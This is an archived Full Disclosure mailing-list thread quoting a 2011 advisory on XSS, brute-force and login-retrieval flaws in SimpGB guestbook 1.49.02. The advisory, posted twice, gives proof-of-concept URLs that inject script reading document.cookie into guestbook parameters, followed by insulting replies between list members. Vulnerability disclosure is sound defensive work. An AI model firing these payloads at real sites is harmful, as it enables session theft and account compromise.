Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Multiple vulnerabilities in SimpGB
From: "Cal Leeming [Simplicity Media Ltd]" <cal.leeming () simplicitymedialtd co uk>
Date: Mon, 7 Feb 2011 07:00:58 +0000

I think it's time for a group hug :|

On Sun, Feb 6, 2011 at 10:43 AM, Michele Orru <antisnatchor () gmail com>wrote:

 ahaah.
Nice reply Sparky.
MustLive, seems you've been defaced :-)

antisnatchor

 ------------------------------

   laurent gaffie <laurent.gaffie () gmail com>
February 5, 2011 3:36 AM

Hey Sparky,

One of the many many thing you didn't understand during the past 5 years is
that you should probably try to identify and fix your stuff on *your*
website, before spamming this ML with your crap.
cf:
http://www.zone-h.org/mirror/id/11367858

e-tard.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------------------------------

   MustLive <mustlive () websecurity com ua>
February 4, 2011 10:49 PM

Hello Laurent!

You are very "intelligent" man, as I see from this and previous your letter
(in 2010).

You need to take into account the next:

1. I know better where to send.

2. If you write shitty stuff, then it doesn't mean that other do the same.

3. No need to think and state instead of other people - if it's not
interesting for you, then it can be interesting for others.

4. The main and obvious thing it's that I write all my advisories from 2006
for those people who are interested in them (and there are such people, as
I
know for sure). So if you or anybody else is not interested in them, just
skip them (and don't need to write me nonsenses) - I'm writing my letters
not for you, but for others who is interested in them and who thanks me for
my work. It's strange that such "intelligent" man as you didn't understand
it for last five years :-).

5. I don't need any not serious letters from you, so don't waste your time
writing me anymore, because I've put your e-mail into blacklist. Spend your
time for good things.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
From: laurent gaffie
To: MustLive
Cc: full-disclosure () lists grok org uk ; bugtraq () securityfocus com
Sent: Wednesday, January 26, 2011 5:09 PM
Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB


Send your shitty stuff to bugtraq () securityfocus com

If it's not obvious, no one give a shit here, seriously.



2011/1/27 MustLive <mustlive () websecurity com ua><mustlive () websecurity com ua>

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If captcha is using in
guestbook, then working code of the captcha is required for the attack. Or
via GET request:


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 ------------------------------

   laurent gaffie <laurent.gaffie () gmail com>
January 26, 2011 4:09 PM

Send your shitty stuff to bugtraq () securityfocus com

If it's not obvious, no one give a shit here, seriously.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------------------------------

   MustLive <mustlive () websecurity com ua>
January 26, 2011 3:15 PM

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If captcha is using in
guestbook, then working code of the captcha is required for the attack. Or
via GET request:


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview


http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault